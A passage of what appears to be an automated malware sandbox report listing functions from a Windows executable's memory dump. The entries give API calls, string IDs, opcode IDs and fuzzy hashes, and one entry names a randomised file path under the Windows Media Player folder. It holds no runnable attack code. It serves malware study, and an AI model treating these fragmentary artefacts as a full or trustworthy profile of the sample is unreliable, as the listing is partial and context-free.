                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF72C9EEEE6), ref: 00007FF72C9F4A51
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                  • Opcode ID: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                  • Instruction ID: f123a9687731b2b6194f3bfe1d3426a0c7f09417624411ac96e7de4bafac4db2
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a651beb4bf27f5407259cea30834cbdef90a895a548db86fc01e64e268f21f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 86115E32618B8182EB619F15F840269B7E5FB98BA4F588230DECC17758EF3CC5518B10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                  • API String ID: 729085983-410509341
                                                                                                                                                                  • Opcode ID: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
                                                                                                                                                                  • Instruction ID: 721fe3fe45f593925bde06e7fb056bd0d29bb83a9dc3689d69d33bfea6b1adc0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a77e4a1c4750c989717916d7749886f1baedb1c4842d737a8bb0566699bff25
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C11C2B2A16B8685EB15AB24F8443EC73A1EB64BB4F804231C96C0B7D5DF7CE540C790
                                                                                                                                                                  APIs
                                                                                                                                                                  • __std_fs_code_page.LIBCPMT ref: 00007FF72C9D2BDE
                                                                                                                                                                    • Part of subcall function 00007FF72C9EE0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF72C9B3F96), ref: 00007FF72C9EE0C6
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3B25
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3BCA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                  • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip$J
                                                                                                                                                                  • API String ID: 1377543553-1822051254
                                                                                                                                                                  • Opcode ID: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                  • Instruction ID: ce28b253401d4a6c1c9a97d34a6a26099b2b1a288bdba40bcb8c1e54ce144262
                                                                                                                                                                  • Opcode Fuzzy Hash: 562919172af5b9e87f5682eb6a0a24944c2d8dc34fa2571c2ff8a2ccba6cf4ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 61E04F55A187C682EA20EB14B8013A9E364FBAD328F540231EECC16755EF3CD2858B54
                                                                                                                                                                  APIs
                                                                                                                                                                  • __std_fs_code_page.LIBCPMT ref: 00007FF72C9D2C2E
                                                                                                                                                                    • Part of subcall function 00007FF72C9EE0B4: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF72C9B3F96), ref: 00007FF72C9EE0C6
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3B25
                                                                                                                                                                    • Part of subcall function 00007FF72C9B3AB0: __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF72C9B3BCA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_convert_narrow_to_wide$ApisFile__std_fs_code_page
                                                                                                                                                                  • String ID: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f$G
                                                                                                                                                                  • API String ID: 1377543553-4099582714
                                                                                                                                                                  • Opcode ID: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                  • Instruction ID: 090fa5b4ba156789c235ff37a1bd3b93552209e60866f5b4ed40472aab54d3f6
                                                                                                                                                                  • Opcode Fuzzy Hash: c8c0632f238214065625dfbc26c946da351fe81e8c674869c76d141565dec898
                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE04F65A187C682EA20EB14B8013A9E364FBAC328F540231EFCC16755EF3CD2858B54